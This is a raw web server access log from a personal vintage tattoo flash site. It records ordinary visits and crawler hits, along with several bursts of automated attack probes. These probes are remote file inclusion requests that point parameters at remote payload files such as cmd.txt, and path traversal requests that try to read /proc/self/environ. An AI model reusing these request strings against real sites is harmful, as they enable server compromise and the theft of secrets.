87.250.255.243 - - [05/May/2010:19:00:32 -0500] "GET /logs/access_log.1223596800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
71.20.124.27 - - [05/May/2010:19:05:58 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=en&start=20&um=1&itbs=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbert%2Bgrimm%26um%3D1%26hl%3Den%26client%3Dfirefox-a%26sa%3DN%26rls%3Dorg.mozilla:en-US:official%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
71.20.124.27 - - [05/May/2010:19:05:59 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.2.219.45 - - [05/May/2010:19:08:17 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=24&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Bflash%2Btattoo%2Bart%26start%3D18%26um%3D1%26hl%3Den%26client%3Dsafari%26sa%3DN%26rls%3Den%26ndsp%3D18%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
12.2.219.45 - - [05/May/2010:19:08:17 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
12.2.219.45 - - [05/May/2010:19:08:17 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
12.2.219.45 - - [05/May/2010:19:08:18 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
12.2.219.45 - - [05/May/2010:19:08:18 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
12.2.219.45 - - [05/May/2010:19:08:19 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.138.39.193 - - [05/May/2010:19:08:26 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.ca/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&hl=en&source=hp&q=vintage+flash&meta=&btnG=Google+Search""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:26 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:28 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:28 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:29 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:29 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:29 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:29 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:29 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:29 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:29 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:29 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:29 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:30 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:30 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
24.138.39.193 - - [05/May/2010:19:08:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
12.2.219.45 - - [05/May/2010:19:08:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tat-cd1.jpg""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.138.39.193 - - [05/May/2010:19:08:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
87.250.255.243 - - [05/May/2010:19:10:18 -0500] "GET /logs/access_log.1222214400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:12:50 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:13:46 -0500] "GET /?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:13:46 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:13:46 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:13:46 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:13:47 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:13:47 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:13:47 -0500] "GET /?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:13:47 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:14:59 -0500] "GET /?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:14:59 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:14:59 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:06 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:06 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:06 -0500] "GET /?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:07 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:07 -0500] "GET /?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:07 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:07 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:09 -0500] "GET /?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:09 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:09 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:09 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [05/May/2010:19:15:20 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.195.227 - - [05/May/2010:19:15:23 -0500] "GET /logs/access_log.1254528000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.37.143.198 - - [05/May/2010:19:15:29 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.195.112.180 - - [05/May/2010:19:15:33 -0500] "GET /logs/access_log.1272240000 HTTP/1.0" 200 478712 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
142.46.205.139 - - [05/May/2010:19:16:55 -0500] "GET /logs//index.php?option=com_restaurante&task=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
142.46.205.139 - - [05/May/2010:19:16:55 -0500] "GET //index.php?option=com_restaurante&task=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
142.46.205.139 - - [05/May/2010:19:16:56 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
142.46.205.139 - - [05/May/2010:19:16:56 -0500] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
142.46.205.139 - - [05/May/2010:19:16:56 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
142.46.205.139 - - [05/May/2010:19:16:56 -0500] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
142.46.205.139 - - [05/May/2010:19:16:56 -0500] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
142.46.205.139 - - [05/May/2010:19:16:56 -0500] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
87.250.255.243 - - [05/May/2010:19:17:27 -0500] "GET /logs/access_log.1223164800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.235 - - [05/May/2010:19:20:52 -0500] "GET /logs/access_log.1188691200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [05/May/2010:19:27:12 -0500] "GET /logs/access_log.1229817600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.241 - - [05/May/2010:19:31:23 -0500] "GET /logs/access_log.1179446400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [05/May/2010:19:32:21 -0500] "GET /logs/access_log.1234483200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.240 - - [05/May/2010:19:35:52 -0500] "GET /logs/access_log.1172793600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
63.123.92.129 - - [05/May/2010:19:37:53 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://www.bing.com/search?q=vintage+tattoo+flash&mkt=en-us&FORM=SOLTLB&PC=SUN1&adlt=strict""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:53 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:53 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:54 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:54 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:54 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:54 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:54 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:54 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:54 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:54 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
63.123.92.129 - - [05/May/2010:19:37:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
207.46.204.227 - - [05/May/2010:19:39:23 -0500] "GET /logs/access_log.1203638400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.208.34.38 - - [05/May/2010:19:39:59 -0500] "GET /info.php?ln=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
81.208.34.38 - - [05/May/2010:19:39:59 -0500] "GET /logs/info.php?ln=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
81.208.34.38 - - [05/May/2010:19:39:59 -0500] "GET /logs/access_log.1209600000/info.php?ln=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.250.255.243 - - [05/May/2010:19:40:47 -0500] "GET /logs/access_log.1251763200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.205 - - [05/May/2010:19:44:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.205 - - [05/May/2010:19:44:04 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.110.50.139 - - [05/May/2010:19:44:37 -0500] "GET /logs//wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.834"
78.110.50.139 - - [05/May/2010:19:44:38 -0500] "GET //wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
87.250.255.243 - - [05/May/2010:19:49:13 -0500] "GET /logs/access_log.1167609600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.189 - - [05/May/2010:19:53:22 -0500] "GET /logs/access_log.1242259200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
